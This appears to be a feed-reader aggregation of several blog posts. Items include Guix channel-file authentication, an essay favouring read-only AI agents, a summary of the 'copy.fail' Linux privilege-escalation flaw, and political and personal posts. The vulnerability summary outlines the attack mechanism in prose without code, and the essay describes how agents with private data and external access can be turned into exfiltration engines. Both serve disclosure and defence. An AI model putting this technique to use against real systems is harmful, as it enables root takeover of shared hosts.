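;; URL, commit, and OpenPGP fingerprint below are placeholders.
(list (channel
        (name 'my-team-channel)
        (url "https://example.org/my-team-channel.git")
        (introduction
         (make-channel-introduction
          "0123456789abcdef0123456789abcdef01234567"
          (openpgp-fingerprint
           "AAAA BBBB CCCC DDDD EEEE  FFFF 0000 1111 2222 3333")))))
```

Note that each entry carries an introduction: as discussed below, a channel without one cannot be authenticated and so cannot be trusted.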

This brings us to the interesting question of channel identity. The channel I call guix-science in my trusted-channels.scm, someone else might just as well call Guix-Science or science; how can I tell if we’re dealing with the channel that I call guix-science and that I trust?

The key insight is that the name itself doesn’t matter; the element that does matter is the “introduction” of the channel—the piece of information that tells how to authenticate updates of that channel. If you forgot that episode, the introduction is the thing with hexadecimal strings that appears in a channel specification:

(channel
  (name 'guix-past)
  (url "https://codeberg.org/guix-science/guix-past")
  (introduction   ;this hex soup 👇 is the channel’s identity
   (make-channel-introduction
    "0c119db2ea86a389769f4d2b9c6f5c41c027e336"
    (openpgp-fingerprint
     "3CE4 6455 8A84 FDC6 9DB4  0CFB 090B 1199 3D9A EBB5"))))

Two channels with the same introduction are one and the same. Thus, if my trusted-channels.scm contains a channel with the above introduction, pull and time-machine will happily pull from it.

The corollary is that a channel that cannot be authenticated—i.e., that lacks the introduction field—cannot be considered a trusted channel.

Overall, this “trusted channel” rule trades flexibility for safety. It’s a tradeoff, but one that looks like a better default than anything that effectively amounts to arbitrary code execution à la curl | sh.

The party

“Why would I want to download channel files?”, you may ask. Here’s a list of typical use cases we have in mind.

The first one is downloading a channel file from a continuous integration system—to deploy from a known-good state, to test a new package version or a new feature, to reproduce a bug, etc. Cuirass serves channel files for every channel set it evaluates. So for example, you can pull the latest Guix channel that was successfully evaluated like this:

guix pull -C https://ci.guix.gnu.org/eval/latest/channels.scm?spec=master

Likewise, this is how you’d travel to the latest Guix-Science channel and dependent channels to execute RStudio:

guix time-machine \
  -C https://guix.bordeaux.inria.fr/eval/latest/channels.scm?spec=guix-science \
  -- shell rstudio -- rstudio

A second, similar use case is one-line commands for demos: if you’re developing an application, you can package it, publish a channel file, and share a time-machine command to spawn it. With pinned channels, you can ensure users run it from a known-good state.

A third use case that is emerging is channel releases. Teams maintaining third-party channels might want to tag releases of their channel as channel files in which each channel is pinned. This is what the Guix-Science project recently decided to do.

In the same vein, a fourth use case is the publication of a tested channel file that a whole team, or a whole fleet of computers, would upgrade from. Imagine a group of people responsible for testing who would periodically publish a new channel file pinned to known-good commits that all the team members or an entire fleet could safely pull from—it could even be used for unattended upgrades!

The fifth use case is reproducible research. A computational workflow can be captured by two files: channels.scm and manifest.scm. In some cases, we might as well download the channel file.

Dissonance?

But wait… the astute reader might have felt some dissonance: downloading a channel file to set up a supposedly reproducible workflow? That can’t be right: the channel file could change over time, or it could vanish from its original URL. That’s not reproducibility, is it?

As Simon Tournier was prompt to suggest, the solution is to support SWHIDs (Software Hash Identifiers) in addition to URLs. A SWHID is essentially a standardized content hash that uniquely identifies “content”—raw data or structured data such as directories and version-control revisions. If you followed along, you might remember that Guix is connected to the Software Heritage archive. Software packaged in Guix is in the archive, and so all we had to do was connect the dots.

Consider this command:

guix time-machine \
  -C swh:1:cnt:003e1e0c1b9b358082201332c926ae54e9549002  \
  -- …

It downloads the channel file identified by the given SWHID and then proceeds.

The SWHID serves as an unambiguous and unique content address to refer to a specific channel set. It can be computed using guix hash, but of course, the channel file must first be present in the Software Heritage archive. Thus, if the file is part of a version-control repository, you can first request archiving of that repository. In a research paper, one may include a single command to re-run computations the paper builds upon.

Pleasurable

This new addition felt pleasurable for several reasons. First because it addresses use cases that people had been talking about for a while, and it’s always nice to fill gaps. It also felt good because several design choices complement each other so that everything here falls into place: channel specifications, Guile’s “sandboxing”, channel authentication, and Software Heritage integration.

The whole endeavor—allowing for quick deployment without compromising on security—might sound quixotic or, some might say, anachronistic, at a time when the pips, the npms, the snaps and many more are all about deploying software of unknown origin like there’s no tomorrow. In Guix we do believe that transparency, provenance tracking, and verifiability matter for the software we run; efforts like this one are guided by these principles.

The feature landed just a few days ago. Give it a try and let’s hope you find it pleasant as well!

Acknowledgments

I am grateful to Caleb “Reepca” Ristvedt for their thorough code review and insightful suggestions, and to Simon Tournier for commenting on the general approach and suggesting improvements. Many thanks to Rutherther and to Cayetano Santos for reviewing an earlier draft of this post.

[$] Scaling transparent huge pages to 1GB [LWN.net]

As a general rule, when developers talk about huge pages, they are referring to PMD-level pages that are 1MB or 2MB in size, depending on the CPU architecture. Most CPUs can support other huge-page sizes, though. On x86 systems, PUD-level huge pages hold 1GB of data. Providing such large pages transparently to processes has generally not been considered as either feasible or desirable, but Usama Arif is trying to change that assessment. At the 2026 Linux Storage, Filesystem, Memory Management, and BPF Summit, he led a session in the memory-management track on how to make transparent huge pages (THPs) truly huge.

Security updates for Tuesday [LWN.net]

Security updates have been issued by AlmaLinux (freerdp, glib2, libsoup3, and openexr), Debian (dnsmasq, p7zip, p7zip-rar, python-authlib, and rails), Fedora (chromium, firefox, httpd, and nss), SUSE (java-25-openj9, krb5, libmodsecurity3, and mcphost), and Ubuntu (imagemagick, linux, linux-aws, linux-aws-fips, linux-aws-hwe, linux-azure-4.15, linux-fips, linux-gcp, linux-gcp-4.15, linux-gcp-fips, linux-hwe, linux-kvm, linux-oracle, linux-azure, linux-azure-fips, linux-oracle, linux-azure-5.15, linux-nvidia, linux-nvidia-6.8, linux-nvidia-lowlatency, and linux-raspi).

14:28

Link [Scripting News]

Yesterday I learned about JSONL, and was of course intrigued. It's a really simple thing, even simpler than RSS, and does basically the same thing. And even better, it's the way the AI industry hooks streams together. So if we can get RSS to serve as a source of JSONL feeds, it's possible that the AI industry will find it useful. My goal is to get every standard of the web hooked up to AI, quickly, before the silos realize they're leaving out something important. Once they figure it out, they'll have no choice but to add real RSS support. So I put together a quick demo app that hooks into FeedLand and posts to a JSONL feed new items from one of a small set of feeds I chose basically at random. And here is the JSONL feed. If you're a developer in AI-land could you try reading this into your JSONL-ingesting app, and let me know if I got it right. Here's a place to comment. BTW, that URL is temporary just for this quick demo.
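For anyone who wants to sanity-check the format before wiring up a reader: JSONL really is just newline-delimited JSON, one object per line. A minimal Python sketch (the item fields and URLs here are made up for illustration, not FeedLand's actual schema):

```python
import json

# Hypothetical feed items, e.g. as parsed out of an RSS feed.
items = [
    {"title": "Good morning sports fans!", "link": "http://example.com/item1"},
    {"title": "Gotta Bounce", "link": "http://www.giantitp.com/comics/oots1343.html"},
]

# JSONL: serialize each item as one line of JSON, joined by newlines.
jsonl = "\n".join(json.dumps(item) for item in items)
print(jsonl)
```

Reading it back is the mirror image: split on newlines and `json.loads` each line.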

Link [Scripting News]

Good morning sports fans!

1343: Gotta Bounce [Order of the Stick]

http://www.giantitp.com/comics/oots1343.html

13:49

Representative Line: Underscore Its Unimportance [The Daily WTF]

Frequent submitter Argle (previously), sends us a short little representative line. The good news is that this line of code came across Argle's screen during a code review: it was being removed. The bad news is that it was sitting in the code base for ages.

_ = len / 8.0f;

Argle writes:

In a code review today. A co-worker wisely removed the line. Dunno the logic that made anyone write it in the first place.

This is C#, though it could be basically any language. Using _ is one of those little conventions that we use to tell the linter to ignore the fact that this variable isn't used. And this variable was not being used. Of course, in addition to being unused, it's also a puzzle: where does the 8.0f come from? No one knows. Why would we even want the length divided by eight? No one knows. There's nothing about this code that gives any indication that it was a meaningful operation at any point.

No one knows what it does, or why it was there in the first place, but someone put the time into making sure the linter didn't complain about its uselessness by using _ as the variable.


12:56

Gyms for Them, Mirrors for Us [Radar]

Personal AI doesn’t have to run your life to change it. It just has to see you clearly and feed your behavior back to you in a way you can’t dodge. Once you look at AI as feedback loops instead of little butlers, the whole “agent” conversation starts to feel upside down.

We’ve overrotated on agents that act and massively underinvested in systems that watch, interpret, and train, for humans and for models.

Stop shipping little butlers

Most personal AI demos orbit the same fantasy: inbox‑zero sidekicks, calendar‑tuning bots, or agents that “just handle it” so you can “focus on what matters.” They’re great on stage but terrible as a risk posture.

The butler model hides a simple asymmetry. A read‑only system that misinterprets you is mildly annoying; you ignore a bad suggestion. A write‑enabled system that misfires in your inbox or CRM is career-limiting. One error is a shrug, the other is an incident report.

That’s the asymmetric agent in one line: Read is cheap; write is expensive. Read can be broad, but write should be narrow, rare, and very hard‑earned. The first, highest‑leverage thing you can build is a mirror: an AI that reads your digital exhaust, synthesizes what it sees, and reflects it back, without ever touching the systems that move money, time, or relationships. Šimon Podhajský’s talk, “Cognitive Exhaust Fumes, or: Read‑Only AI Is Underrated,” is a great example of this pattern in the wild.

This isn’t a temporary sandbox before “real agents.” Treating read‑only as a stepping stone and write as the prize is how you hand a chainsaw to a toddler because they’ve proven they can hold a spoon.

Cognitive exhaust is the real dataset

Your day produces a ridiculous amount of cognitive exhaust: emails half‑written, tabs abandoned, tasks snoozed, articles skimmed, and notes forgotten. Any one stream is noisy. The value appears when you correlate across all of them.

A serious personal AI can sit over multiple sources—mail, calendar, notes, browser history, docs, and CRM—and build a cross‑cutting view of what you do versus what you say you care about. You want it a bit judgmental. You want it to surface things like:

  • Intention–action gaps: projects you “prioritize” but never touch
  • Attention drift: where your time really went
  • Relationship decay: people you insist are key but haven’t contacted in months

Podhajský’s system does exactly this, using a read‑only agent that writes only into its own Obsidian vault—no edits to the original systems, no auto‑emails, just brutally honest reflections and suggested experiments.

Here’s the trap: Your agent must only observe. The moment an agent writes back into the systems it’s monitoring, you’ve poisoned the well. You’re not observing your behavior anymore; you’re observing an AI‑amplified feedback loop. You’ve built an observability rig that forges its own logs. The data stops being “you” and becomes “you plus a stochastic autocomplete with opinions.”

For personal AI, that’s existential. If the whole point is to help you see yourself more clearly, having the same system both author and interpret the traces destroys the value proposition. The mirror starts painting your reflection.

Feedback loops, not party tricks

Seen as feedback loops, the symmetry becomes obvious.

A mirror is a loop targeting your nervous system. The “model” being updated is the human. The exhaust is your digital activity. The environment is your toolchain. The reward shows up as shame, insight, or resolve when you see your week laid bare.

A gym is a loop targeting model weights. The model acts in a world, receives rewards or penalties, and updates its policy. The exhaust is trajectories of prompts, actions, outcomes. The environment is a task harness. The reward is a verifiable signal.

Two different learners, same structure:

  • In the mirror, the user is the learner and the agent is a silent observer.
  • In the gym, the model is the learner and the environment is the judge.

Both are broken for the same reason: We obsess over agents doing flashy things and neglect the quality of the signal that trains the system—human or model. We ship chatty butlers and call it “intelligence” instead of asking, “How clean is the feedback?”

Environments are the new unit of deployment

On the model side, we’re still trying to prompt‑engineer our way into reliability. That’s cute for prototypes but reckless for systems you depend on.

We spent 20 years perfecting CI/CD for deterministic code—version control, reproducible builds, test harnesses, staging, blue‑green deploys—all so we could ship with confidence. Meanwhile, we vibe‑check stochastic agents into production with a handful of prompts and a cherry‑picked demo.

A more sensible default is to treat the environment definition—the code and configuration that specify the world the model lives in—as the unit of deployment. Libraries like Verifiers make this concrete by packaging environments for LLMs with tools, datasets, parsing logic, rewards, and rollout policies in one place.

To make that definition precise, you need four anchors:

  • State schema: The shape of the world the environment exposes to the model at each step (fields, types, invariants)
  • Action interface: The tools or functions the model is allowed to call, with their inputs and outputs
  • Reward spec: The checks you run to score behavior (correct/incorrect, passed/failed, right tool, right schema)
  • Rollout policy: How you exercise the environment (single‑turn versus multi‑turn, maximum steps, termination conditions)
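To make the four anchors concrete, here's a minimal sketch in plain Python. This is deliberately not the API of Verifiers or any other library; every name is illustrative:

```python
from dataclasses import dataclass
from typing import Any, Callable

@dataclass
class EnvironmentDefinition:
    """The four anchors, as one deployable object (illustrative only)."""
    state_schema: dict                      # shape of the world the model sees
    actions: dict                           # action interface: tool name -> impl
    reward: Callable[[Any, Any], float]     # reward spec: (expected, actual) -> score
    max_steps: int = 8                      # rollout policy: episode length cap
    multi_turn: bool = True                 # rollout policy: single- vs multi-turn

def run_episode(env, policy, task):
    """Roll out one episode: the policy picks actions until submit or max_steps."""
    state, total = task["initial_state"], 0.0
    for _ in range(env.max_steps):
        name, args = policy(state)
        if name == "submit":                # terminal action: score the final answer
            total += env.reward(task["expected"], args)
            break
        state = env.actions[name](state, args)
        if not env.multi_turn:
            break
    return total
```

The point of the shape: any candidate model is just a `policy` plugged into the same world, scored by the same reward, under the same rollout rules.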

You’re not “deploying state” in the sense of a frozen snapshot of production. You’re deploying the rules of the game: what the model can see, what it can do, how you score it, and how you run episodes. Any candidate model you plug into that environment is evaluated and constrained the same way. You then treat that environment definition like a test suite plus staging cluster: comparing models on behavior that matters for your workflow, training smaller, specialized models using verifiable rewards instead of vibes, and detecting regressions when either models or tools change.

For enterprises, this means you don’t “deploy an LLM” with some prompts. You ship an environment package: code, config, and test data that define the world; plus metrics and logging. The model is a plug‑in you can swap or retrain based on how it behaves inside that package, not in an ad hoc prompt sandbox.

Observers, gyms, and asymmetric agents

Mirrors and gyms are both environments built around feedback loops. The difference is who’s allowed to touch reality.

  • Mirrors watch you. The AI reads broadly, writes only to its own notes, and hands you structured feedback. You learn; you act.
  • Gyms watch the model. The AI acts inside a sandbox, collects rewards, updates its weights. The model learns; the environment constrains.

Agents—the things that take actions in live systems—should sit downstream of both. They should be asymmetric by design:

  • In production, agents default to read‑only or read‑mostly. Write access is narrow, logged, reviewable, and easy to kill.
  • In training and evaluation, agents can be fully read‑write but only inside deliberately engineered environments.
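A minimal sketch of that asymmetry, assuming hypothetical read/write tool registries (nothing here is a real agent-framework API):

```python
import logging

log = logging.getLogger("agent.writes")

class AsymmetricToolbelt:
    """Reads pass through freely; writes are allowlisted, logged, killable."""

    def __init__(self, read_tools, write_tools, allowed_writes):
        self._reads = read_tools
        self._writes = write_tools
        self._allowed = allowed_writes
        self.writes_enabled = True          # the kill switch

    def call(self, name, *args, **kwargs):
        if name in self._reads:
            return self._reads[name](*args, **kwargs)
        if name in self._writes:
            if not self.writes_enabled or name not in self._allowed:
                log.warning("blocked write %s args=%r", name, args)
                raise PermissionError(f"write tool {name!r} not permitted")
            log.info("write %s args=%r", name, args)   # reviewable audit trail
            return self._writes[name](*args, **kwargs)
        raise KeyError(f"unknown tool {name!r}")
```

Note the shape of the failure mode: a write that isn't on the allowlist doesn't silently degrade, it raises — narrow, logged, reviewable, easy to kill.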

Anything else is YOLO alignment: You train in production, corrupt your own telemetry, and then argue with the logs when something goes wrong.

Think of it as risk management for agents. Every new write permission expands the blast radius. If you haven’t instrumented the read path, you’re taking on unpriced risk. Gyms for them, mirrors for us, asymmetric agents at the edges—that’s a risk posture you can explain to an auditor.

Butler agents are security theater

Now add security to the mix. Simon Willison’s “lethal trifecta” of agent risk is simple: private data, untrusted inputs, and external communications. Get all three in one agent and you’ve basically handed an attacker a loaded gun.

Most “do‑everything” butler agents proudly hit the trifecta: They ingest piles of sensitive internal data, they cheerfully process whatever the internet throws at them, and they’re allowed to send emails, modify records, or call external APIs. You’ve built a hyper‑efficient exfiltration and amplification engine.

Observer AI pulls in the opposite direction. It can still see private data but uses it only to generate internal reflections or drafts. It treats untrusted inputs as something to analyze, not something to obey. And it doesn’t touch external channels; you stay in the loop.

Butler agents give executives the feeling that “AI is doing work for us” while dramatically increasing the blast radius of prompt injection, model hallucinations, or compromised keys. Observers are actual governance: They help humans see, reason, and decide before anything gets written where it counts.

In the enterprise, “agentic workflows” without observer environments are just shadow IT with better branding. If you can’t instrument and audit what the system reads, you have no business trusting what it writes.

Boots on the ground: The friction is real

This isn’t just a whiteboard problem. In big bank reality, the conversation often goes like this:

Client: “We want an AI assistant that updates customer records, sends follow‑ups, and opens tickets automatically.”

Me: “Great. Show me your observability. How do you know what it’s reading today and how those reads map to actions?”

Client: “…we have logs?”

Say, “No, your shiny new bot should not have direct write access to the CRM,” and the first reaction is disbelief. Then come the workarounds: “What if it drafts and auto‑sends unless someone clicks reject?” “What if it only updates ‘safe’ fields?” “What if the human is technically in the loop but the default is accept?” All of them duck the hard work of building the mirror and the gym first.

In a post‑GDPR, post‑breach world, an observer that doesn’t push data is a compliance gift. A write‑enabled agent is a data‑deletion nightmare and a discovery headache. We’re desperate to give agents hands before we’ve given ourselves eyes. Until you can trace the read path—what’s accessed, why, and with what downstream effect—every new write permission is architectural debt with a ticking clock.

A simple playbook

If you’re trying to bring order to this chaos, here’s a blunt playbook.

Build observers first
Aggregate your cognitive exhaust—or the org’s. Start with a read‑only layer across mail, tickets, docs, code, CRM, usage logs. Have it produce structured reflections: where work happens, where intent and action diverge, and where relationships or processes are decaying. Let it write only into its own vault.

Encode scary workflows as environments
Pick high‑risk, high‑value flows: claims adjudication, payment routing, change approval, remediation—anything with money, legal exposure, or brand risk. For each, define an environment with clear state schema, action interface, reward spec, and rollout policy. Use frameworks like Verifiers to make these reusable instead of bespoke scripts.

Treat environments as deployable artifacts
Think of an environment as a repo you can clone—not a frozen copy of production but the minimum code, configuration, and sample data needed to exercise a workflow reproducibly. You version, test, and promote that environment package the way you do services. When APIs, schemas, or policies change, you update the package and rerun the suites. You don’t “prompt harder” in production and hope.
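One way to sketch the mechanics of "environment as deployable artifact": content-address the package so runs are comparable, and gate promotion on a pinned baseline. Both helpers are illustrative, not from any particular framework:

```python
import hashlib
import json

def package_fingerprint(env_config: dict) -> str:
    """Content-hash the environment definition so runs are comparable:
    same fingerprint -> same rules of the game."""
    canonical = json.dumps(env_config, sort_keys=True).encode()
    return hashlib.sha256(canonical).hexdigest()[:12]

def regression_gate(scores, baseline, tolerance=0.02):
    """Promote a model (or a changed environment) only if mean episode
    score stays within tolerance of the pinned baseline."""
    mean = sum(scores) / len(scores)
    return mean >= baseline - tolerance
```

When an API, schema, or policy changes, the fingerprint changes, the suite reruns, and the gate either passes or it doesn't — the same promote/rollback discipline you already apply to services.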

Only then, grant narrow write access
Once mirrors and gyms are in place, start handing out tightly scoped write capabilities—one surface at a time, with metrics and rollback. And have your observers watching both human and agent behavior for drift. This is slower. It’s also professional.

Rethinking “personal” and “agentic”

Reframing AI around feedback loops does odd things to our buzzwords. “Personal AI” stops being “a bot that talks like you and acts for you” and becomes “an observability layer on your own cognition.” It’s closer to therapy than outsourcing. Therapy doesn’t send emails for you; it changes how you write them.

“Agentic AI” stops being “a thing that chains tools together” and becomes “a thing that lives inside an environment with explicit constraints and signed‑off rewards.” The swagger moves from the model to the environment. The question shifts from “How smart is your agent?” to “How well‑designed is the world you’re letting it inhabit?”

Gyms for them, mirrors for us. Agents only where the feedback loops are strong enough to justify the risk. Less demo‑friendly than a bot that spams your calendar, sure. But a lot closer to something you can live with—in your personal life, and in a production architecture that must survive contact with reality.

12:14

Copy.Fail Linux Vulnerability [Schneier on Security]

This is the worst Linux vulnerability in years.

TL;DR

  • copy.fail is a Linux kernel local privilege escalation, not a browser or clipboard attack. Disclosed by Theori on 29 April 2026 with a working PoC.
  • It abuses the kernel crypto API (AF_ALG sockets) plus splice() to write four bytes at a time straight into the page cache of a file the attacker does not own.
  • The exploit works unmodified across Ubuntu, RHEL, Debian, SUSE, Amazon Linux, Fedora and most others. No race condition, no per-distro offsets.
  • The file on disk is never modified. AIDE, Tripwire and checksum-based monitoring see nothing.
  • Kubernetes Pod Security Standards (Restricted) and the default RuntimeDefault seccomp profile do not block the syscall used. A custom seccomp profile is needed.
  • The mainline fix landed on 1 April. Distros are rolling kernels out now. Patch.
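On the seccomp point: a process can probe from the inside whether the crypto-API entry point is reachable. The sketch below is illustrative, not from the advisory — treat "reachable" as "this particular mitigation is not in place," not as proof of exploitability:

```python
import errno
import socket

def af_alg_reachable() -> str:
    """Probe whether this process can open an AF_ALG (kernel crypto API)
    socket: 'blocked', 'unsupported', or 'reachable'."""
    if not hasattr(socket, "AF_ALG"):
        return "unsupported"        # non-Linux, or very old Python
    try:
        s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    except OSError as e:
        if e.errno in (errno.EPERM, errno.EACCES):
            return "blocked"        # seccomp or an LSM is denying the socket
        if e.errno == errno.EAFNOSUPPORT:
            return "unsupported"    # kernel built without AF_ALG
        raise
    s.close()
    return "reachable"
```

A custom seccomp profile that returns an error for `socket()` calls with the `AF_ALG` domain would flip this probe from "reachable" to "blocked" — which is the mitigation the TL;DR says the default RuntimeDefault profile does not provide.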

“Local privilege escalation” sounds dry, so let me unpack it. It means: an attacker who already has some way to run code on the machine, even as the most boring unprivileged user, can promote themselves to root. From there they can read every file, install backdoors, watch every process, and pivot to other systems.

Why does that matter on shared infrastructure? Because “local” covers a lot of ground in 2026: every container on a shared Kubernetes node, every tenant on a shared hosting box, every CI/CD job that runs untrusted pull-request code, every WSL2 instance on a Windows laptop, every containerised AI agent given shell access. They all share one Linux kernel with their neighbours. A kernel LPE collapses that boundary.

News article.

11:28

The Law of Unintended Consequences [Judith Proctor's Journal]

Those who love 'The Good Place' as much as I do will probably recognise the quote.

'The Law of Unintended Consequences' says that it's not possible to live a perfect life in modern society.  Everything we do impacts negatively on the environment or involves low-paid labour, unethical working practices, etc.

But there are some things we can do.

We can't win, but we can nibble at the edges.

Shampoo

Advertisers work hard to convince us that we need to wash our hair every single day to keep it perfect, but our ancestors didn't have shampoo.  Shampoo didn't reach the UK until the eighteenth century.

I used to suffer from regular problems with my ears.  I thought it was earwax build up, until the lady syringing my ears said it was thin slivers of skin.

I wondered what was triggering it, and considered that shampoo might be a possible cause.


Taking a deep breath, I began cutting out shampoo at a week-long folk festival - where so many people were camping that no one would notice if I was looking a mess.

My hair got greasy, but not as badly as I'd expected.  I carried on with the experiment...

After two months of not stripping all the natural oils in my hair and scalp, my body stopped over-producing them in an effort to replace them.

Over 30 years later, I still haven't gone back to using shampoo, and my hair isn't greasy.  I wash it with water, and that's all.  Brushing distributes the oils evenly and keeps it silky, but not greasy.

Another member of my family who went the same way, briefly tried shampoo recently, and promptly got dandruff (which they'd never had before).

Not saying this will work for everyone, but you can save a LOT of money, and reduce your environmental impact as well (detergent kills fish).  If you do go for it, cut down gradually.  Reduce the amount of shampoo you use, and reduce the frequency of washes.  If you cut down gradually, then you'll avoid the greasy phase.  Maybe use some sort of tiny measuring cup to measure the amount you use?


10:28

Early rejections [Seth's Blog]

Long after the fact, these are the best kind. They remind us of how far we’ve come. They’re proof that not giving up was a good idea. They are fuel for the next thing.

But, at the time, they’re pretty hard to live with.

All we can do is remind ourselves that it’s an unskippable part of a useful journey.

08:28

Pluralistic: A fascist paradigm (12 May 2026) [Pluralistic: Daily links from Cory Doctorow]


Today's links



A king on a sumptuous, much elaborated throne; in one hand he holds a sceptre of office, in the other, the leashes for two fierce stone dogs that guard the throne. The king's head has been replaced with a character who was used as the basis for MAD Magazine's Alfred E Neumann. The new head sports a conical dunce cap. Behind the king is a UK Reform Party rosette. The background is an Egyptian temple, ganked from a Dore Old Testament engraving. The floor has been carpeted in sumptuous tabriz from the Ottoman court.

A fascist paradigm (permalink)

Yesterday, I attended a workshop on systems thinking and political change, which included a presentation on the work of Donella Meadows, whose Thinking in Systems is a canonical work on the subject:

https://en.wikipedia.org/wiki/Thinking_In_Systems:_A_Primer

"Systems thinking" is an analytical framework that treats the world as a mesh of interconnected, nonlinear components and relationships that can't be easily understood or steered. A complex system isn't merely "complicated." A mechanical watch is complicated, in that it has many parts that work together in ways that require training and specialized knowledge to understand. But it isn't "complex" because each part has a specific function that can be understood and adjusted.

In a complex system – say, an ecosystem – the parts are meshed in a web of unobvious relationships that make it difficult to predict what effect will follow from a given perturbation. When a blight kills off a plant species, the soil stability declines, resulting in landslides during the rainy season, changing the mineral content of nearby waterways, which creates microbial blooms or fish die-offs in a distant, downstream lake.

A slide showing a lever weighted down on one end by a circle labeled 'System' next to a fulcrum; the points along the lever are labeled with different potential interventions that can move the system, taken from the work of Donella Meadows.

But systems thinking isn't a counsel of despair that insists that you shouldn't do anything because you can never predict what will come of your actions. In Thinking in Systems, Meadows presents a hierarchy of leverage points for changing a system, ranked from least effective ("Constants, numbers, parameters") to most ("The power to shift paradigms to deal with new challenges"):

https://www.flickr.com/photos/doctorow/55264856861/

In all, Meadows theorizes 12 different "places to intervene in a system." The least effective of these – constants like taxes and standards, negative and positive feedback loops – are the sites of most of our political fights, and rightly so. They are the fine-tuning knobs of the system that adjust its margins. Once you have the rule of law ("the rules of the system"), you can drive change by amending, repealing or passing a law:

https://donellameadows.org/archives/leverage-points-places-to-intervene-in-a-system/

But when you're confronted with a system that is significantly, persistently dysfunctional, you will likely have to work at sites that are further up the hierarchy, such as "the distribution of power over the rules of the system" or "the goals of the system"; or the most profound of all, "the paradigm out of which the system — its goals, power structure, rules, its culture — arises."

Thinking about paradigms is a form of "meta-cognition," which is to say, "thinking about how you think." Your paradigm encompasses all your assumptions, including your assumptions about how to proceed from your other assumptions: "if x, then y" is a paradigm.

The workshop where we were discussing all of this is part of a group whose goal is reversing the antidemocratic movement in our society and the climate emergency that is its backdrop. But as I listened to the speaker and the ensuing discussion, it occurred to me that Meadows' theoretical work was a very good way of describing the successes of the fascist movement in the UK and around the world.

Fascists like Farage and Trump are, at their root, anti-democratic. Their pitch is that the people are incapable of self-determination (as Peter Thiel puts it, "democracy is incompatible with freedom"). They want us to think that all our neighbors are irrational and foolish, and that we, too, are irrational and foolish, and that our safety and prosperity can only be safeguarded if we seek out those few people who are born to rule and liberate them from the petty niceties and regulations that democracy and the rule of law demand.

In other words, the paradigm of democracy is that all of us are capable of both wise self-governance and self-rationalized misgovernance, and each of us has a useful perspective to contribute. The fascist paradigm is that we can't be trusted to rule ourselves, and only the people who are born with "good blood" are capable of directing our lives:

https://pluralistic.net/2025/05/20/big-cornflakes-energy/#caliper-pilled

This is the theory behind "race realism" and "human diversity" and all the other polite names the modern fascist uses to obscure the fact that they're reviving eugenics. It explains the panic over DEI, a panic driven by the belief that lesser people are being elevated to positions of rule and authority that they are genetically incapable of carrying out.

That's why, whenever a disaster arises, fascists demand to know the gender, race and sexual orientation of the pilot, the ship's captain, or the official in charge. If the person who crashed the cargo ship into the bridge has brown skin, we can add another line to the ledger of costs associated with the doomed project to put people who were born to be bossed around in the boss's seat (of course, if the pilot turns out to be a white guy, that proves nothing, except that mistakes sometimes happen).

The revival of fascism in this century has been scarily effective, and at times it can feel unstoppable. Meadows' work on systems thinking provides an explanation for that efficacy – and suggests a theory of change for dispatching fascism back to the graveyard of history. Fascists have made changes to things like laws and feedback loops, rules and distribution of power, but this all stems from a more profound alteration to the system, at the level of the paradigm.

Which suggests that the real fight we have is over that paradigm: we have to convince our neighbors that they are smart enough to rule themselves, and so are we, and so is everyone else. We have to convince them that even the smartest and wisest person (including us, including them) is capable of folly and needs to have checks on their (our) authority.

We need to attack the theory of the "unitary executive" and every other autocratic ideology head on. We have to insist that these aren't just unconstitutional, but that they are ideologically catastrophic. "No kings," because even an omnibenevolent king isn't omniscient, and that means that omnipotence is always omnidestructive in the long run.

The fascist revival has been scarily effective and resilient – and systems thinking offers an explanation for both that efficacy and that resiliency.


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago First aid for the dying dotcom http://modernhumorist.com/mh/0010/dotcom/

#20yrsago OpenStreetMap maps Isle of Wight, Manchester next https://wiki.openstreetmap.org/wiki/Mapchester_Mapping_Party_2006

#20yrsago Fueling model rockets with Oreo fillings https://web.archive.org/web/20060616192646/https://www.popsci.com/popsci/how20/600152d7d441b010vgnvcm1000004eecbccdrcrd.html

#20yrsago Legal guide for podcasters https://wiki.creativecommons.org/wiki/Welcome_To_The_Podcasting_Legal_Guide

#20yrsago Collection of 1100+ found grocery lists https://grocerylists.org/

#10yrsago Mayor of Jackson, MS: “I believe we can pray potholes away” https://www.wjtv.com/news/jackson-mayor-tony-yarber-we-can-pray-potholes-away/

#10yrsago What’s the best way to distribute numbers on the faces of a D120? https://web.archive.org/web/20160510182023/https://www.wired.com/2016/05/mathematical-challenge-of-designing-the-worlds-most-complex-120-sided-dice/

#10yrsago Billionaire Paypal co-founder Peter Thiel will be a California Trump delegate https://web.archive.org/web/20160510155226/https://www.wired.com/2016/05/investor-peter-thiel-will-california-delegate-trump/

#10yrsago McClatchy newspapers’ CEO pleased to announce that he’s shipping IT jobs overseas https://web.archive.org/web/20160510102956/https://www.computerworld.com/article/3067304/it-careers/newspaper-chain-sending-it-jobs-overseas.html

#10yrsago Peace in Our Time: how publishers, libraries and writers could work together https://locusmag.com/feature/cory-doctorow-peace-in-our-time/

#10yrsago Too Like the Lightning: intricate worldbuilding, brilliant speculation, gripping storytelling https://memex.craphound.com/2016/05/10/too-like-the-lightning-intricate-worldbuilding-brilliant-speculation-gripping-storytelling/

#5yrsago LA traveling toward free public transit https://pluralistic.net/2021/05/10/comrade-ustr/#get-on-the-bus

#5yrsago Biden's shift on vaccine patents is a Big Deal https://pluralistic.net/2021/05/10/comrade-ustr/#vaccine-diplomacy


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers.

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

